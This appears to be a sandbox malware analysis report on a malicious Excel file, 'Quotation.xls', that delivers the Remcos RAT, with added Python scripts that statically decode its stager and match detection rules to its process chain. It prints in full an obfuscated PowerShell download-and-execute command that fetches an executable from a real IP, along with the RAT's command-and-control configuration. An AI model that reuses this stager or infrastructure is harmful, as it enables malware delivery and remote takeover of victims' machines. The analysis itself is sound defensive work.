Analysis Report
Quotation.xls
Overview
General Information
Detection
Remcos
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious Excel or Word document
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious command line found
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found a large number of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match
- System is w7x64
  - EXCEL.EXE (PID: 2932 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  - mshta.exe (PID: 3296 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
  - cmd.exe (PID: 3376 cmdline: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
  - powershell.exe (PID: 3400 cmdline: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  - csc.exe (PID: 3512 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
  - cvtres.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  - winiti.exe (PID: 3608 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760)
  - InstallUtil.exe (PID: 3660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: AF862061889F5B9B956E9469DCDAE773)
  - mshta.exe (PID: 3828 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
  - cmd.exe (PID: 3912 cmdline: identical to PID 3376 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
  - powershell.exe (PID: 3936 cmdline: identical to PID 3400 MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  - csc.exe (PID: 4020 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
  - cvtres.exe (PID: 4032 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  - winiti.exe (PID: 4076 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760)
  - MSBuild.exe (PID: 1808 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: C1BE61F3DE532751D6C1A35B851B0367)
  - AddInProcess32.exe (PID: 2480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
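The stager in the process list above can be decoded without running it. The script below is an added example, not code from the Joe Sandbox report: it takes the command line recorded for powershell.exe (PID 3400), resolves the '...'+[char]N+'...' concatenation that keeps the "::" operators and the quoted base64 off the command line, strips the whitespace that the report's rendering wraps into the blob every ten characters (which is what you get when copying a command line out of the HTML report), decodes it, and pulls out the indicators. The decoded second stage is an Add-Type P/Invoke declaration of urlmon!URLDownloadToFile, a download of http://107.173.143.46/T2507F/csrss.exe to $Env:APPDATA\winiti.exe, a three-second sleep, and a start of that file, which is the winiti.exe process that follows in the list.

```python
"""Static deobfuscation of the PowerShell stager from the process list
above. Added example, not code from the Joe Sandbox report. STAGER_CMDLINE
is the command line recorded for powershell.exe (PID 3400); its base64
argument is embedded as the report's HTML renders it, wrapped with a space
every ten characters, and the decoder strips that whitespace."""
import base64
import re

STAGER_B64 = """JDF6SU dOc3cgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgPSAg ICAgICAgIC
AgICAgICAg ICAgICAgIC AgICAgICBh ZEQtdFlwRS AgICAgICAg ICAgICAgIC AgICAgICAg
ICAgICAgIC AtbUVNYmVy ZGVmaU5JVE lvbiAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC
AgICAnW0Rs bEltcG9ydC gidXJsbW9u IiwgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg
ICAgQ2hhcl NldCA9IENo YXJTZXQuVW 5pY29kZSld cHVibGljIH N0YXRpYyBl eHRlcm4gSW
50UHRyIFVS TERvd25sb2 FkVG9GaWxl KEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg
ICAgICAgIC ByTVh2eVRs VnFGLHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC
AgICBvLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBQQ2 csdWludCAg
ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBr RnZHWHFFdG dOLEludFB0 ciAgICAgIC
AgICAgICAg ICAgICAgIC AgICAgICAg ICBIeCk7Jy AgICAgICAg ICAgICAgIC AgICAgICAg
ICAgICAgIC AtTkFNRSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAi ZGIiICAgIC
AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OQW 1lU3BhY2Ug ICAgICAgIC AgICAgICAg
ICAgICAgIC AgICAgICAg eUFqVFB0cC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC
AtUGFzc1Ro cnU7ICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICQxek lHTnN3OjpV
UkxEb3dubG 9hZFRvRmls ZSgwLCJodH RwOi8vMTA3 LjE3My4xND MuNDYvVDI1 MDdGL2Nzcn
NzLmV4ZSIs IiRFbnY6QV BQREFUQVx3 aW5pdGkuZX hlIiwwLDAp O1N0QXJULX NMZUVwKDMp
O3NUQVJUIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC IkRW5WOkFQ UERBVEFcd2
luaXRpLmV4 ZSI="""

STAGER_CMDLINE = (
    "POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; "
    "IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+"
    "'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+"
    "'fRoMbASe64strinG('+[Char]34+'" + STAGER_B64 + "'+[CHAr]34+'))')))"
)

# Layer 1: the inner expression is glued together from single-quoted
# literals and [char]N pieces (0x3A / 58 -> ':', 34 -> '"') so that "::"
# and a quoted base64 string never appear literally on the command line.
TOKEN = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)|\+", re.I)


def resolve_char_concat(expr):
    """Evaluate the 'lit'+[char]N+'lit' concatenation without running it."""
    out = []
    for m in TOKEN.finditer(expr):
        lit, num = m.group(1), m.group(2)
        if lit is not None:
            out.append(lit)
        elif num is not None:
            out.append(chr(int(num, 0)))  # int(x, 0) accepts 0x3A, 0X3A and 58
    return "".join(out)


# Layer 2: the resolved text is [System.Text.Encoding]::Utf8.GetString(
# [System.Convert]::FromBase64String("...")), run through nested IEx calls.
B64_ARG = re.compile(r'fromBase64String\(\s*"([A-Za-z0-9+/=\s]+)"', re.I)


def decode_stager(cmdline):
    """Return the second-stage PowerShell carried inside the command line."""
    resolved = resolve_char_concat(cmdline)
    m = B64_ARG.search(resolved)
    if m is None:
        raise ValueError("no FromBase64String(...) literal found")
    blob = re.sub(r"\s+", "", m.group(1))  # drop the report's wrap spaces
    text = base64.b64decode(blob, validate=True).decode("utf-8")
    return re.sub(r"\s+", " ", text).strip()  # collapse the padding runs


def extract_iocs(stage2):
    """Pull out what a responder blocks or hunts for in the decoded stage."""
    return {
        "urls": re.findall(r'https?://[^\s"\']+', stage2),
        "paths": re.findall(r'\$Env:[A-Za-z_]+\\[^\s"\']+', stage2, re.I),
        "pinvoke": re.findall(r'DllImport\("([^"]+)"', stage2),
        "cmdlets": sorted({w.lower() for w in re.findall(
            r"\b(?:add-type|start-sleep|start)\b", stage2, re.I)}),
    }


if __name__ == "__main__":
    stage2 = decode_stager(STAGER_CMDLINE)
    print(stage2)
    for key, value in extract_iocs(stage2).items():
        print(f"{key}: {value}")
```

The decoded text is padded with long runs of spaces between tokens, which the decoder collapses; the mixed-case cmdlet names (adD-tYpE, StArT-sLeEp) are left as found so a case-sensitive rule can still see them. Only the two tricks this sample uses (single-quoted literals and [char]N) are handled; stagers built with -f formatting, -join, or reversed strings need their own resolver step before the base64 search.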
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": "unifrieghtmovers.com:2558:1", "Assigned name": "Gasplant", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-E2SMAR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
| REMCOS_RAT_variants | unknown | unknown | |
| INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | |
(5 of 18 entries shown)
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
| REMCOS_RAT_variants | unknown | unknown | |
| INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | |
(5 of 43 entries shown)
System Summary |
---|---|
Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) |
Source: | Author: Michael Haag |
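The Sigma titles in the signature list (Suspicious Microsoft Office Child Process, Suspicious MSHTA Child Process, Dynamic .NET Compilation Via Csc.EXE) and the sandbox's own PowerShell signatures all key on the process chain shown above. The check below is an added example, not Sigma's or Joe Sandbox's code: it runs simplified restatements of those rules over process-creation events constructed from this report's process list. The parent PIDs and the powershell.exe image path are assumptions, since the flattened list does not record them, and the stager's base64 argument is shortened to a placeholder.

```python
"""Process-chain checks over the process list of the report above. Added
example, not Joe Sandbox or Sigma code: the rules are simplified
restatements of the ideas behind the listed signature titles. The parent
links (ppid) and the powershell.exe image path in EVENTS are assumed."""
import ntpath
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
PS_NORMAL = {"powershell", "powershell.exe", "PowerShell", "PowerShell.exe",
             "POWERSHELL.EXE"}
PS_INDICATORS = [r"(?<!\S)-e\w*\s+bypass\b", r"(?<!\S)-nop\b",
                 r"(?<!\S)-w\s+1\b", r"\biex\b", r"frombase64string"]


def ev(pid, ppid, image, cmdline):
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}


# Stager command line from the report, base64 argument replaced by a placeholder.
STAGER = ("POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; "
          "IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING("
          "[sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'"
          "<base64 omitted>'+[CHAr]34+'))')))")

# Constructed from the report's process list; ppid values are assumed.
EVENTS = [
    ev(2932, 1000, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
       r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    ev(3296, 2932, r"C:\Windows\System32\mshta.exe",
       r"C:\Windows\System32\mshta.exe -Embedding"),
    ev(3376, 3296, r"C:\Windows\system32\cmd.exe",
       r'"C:\Windows\system32\cmd.exe" "/c ' + STAGER + '"'),
    ev(3400, 3376, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # path assumed
       STAGER),
    ev(3512, 3400, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
       r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
       r'@"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"'),
    ev(3520, 3512, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
       r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY '
       r'/MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" '
       r'"c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"'),
    ev(3608, 3400, r"C:\Users\user\AppData\Roaming\winiti.exe",
       r'"C:\Users\user\AppData\Roaming\winiti.exe"'),
    ev(3660, 3608, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe",
       r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"'),
]


def _name(path):
    return ntpath.basename(path).lower()


def detect(events):
    """Return (rule title, pid) pairs, one per rule that fires on an event."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        child, cmd = _name(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        pname = _name(parent["image"]) if parent else ""
        if pname in OFFICE and child in LOLBINS:
            hits.append(("Suspicious Microsoft Office Child Process", e["pid"]))
        if pname == "mshta.exe" and child in LOLBINS:
            hits.append(("Suspicious MSHTA Child Process", e["pid"]))
        if child == "csc.exe" and re.search(r"\\appdata\\local\\temp\\", cmd, re.I):
            hits.append(("Dynamic .NET Compilation Via Csc.EXE", e["pid"]))
        if child == "powershell.exe":
            # Case anomaly: the binary name as typed on the command line is
            # not one of the spellings that shells and schedulers normally emit.
            m = re.match(r'\s*"?([^\s"]*powershell(?:\.exe)?)', cmd, re.I)
            if m and ntpath.basename(m.group(1)) not in PS_NORMAL:
                hits.append(("PowerShell case anomaly found", e["pid"]))
            score = sum(bool(re.search(p, cmd, re.I)) for p in PS_INDICATORS)
            if score >= 2:
                hits.append(("Suspicious powershell command line found", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"PID {pid}: {rule}")
```

Each rule is evaluated per event against its parent, so the chain fires once per link (mshta under Excel, cmd under mshta) rather than once for the whole tree, which is how these Sigma rules behave in a SIEM. The indicator count for the PowerShell line is deliberately tolerant of case and of the short forms (-ex, -nop, -w 1) that this sample uses to dodge string matches on the long option names.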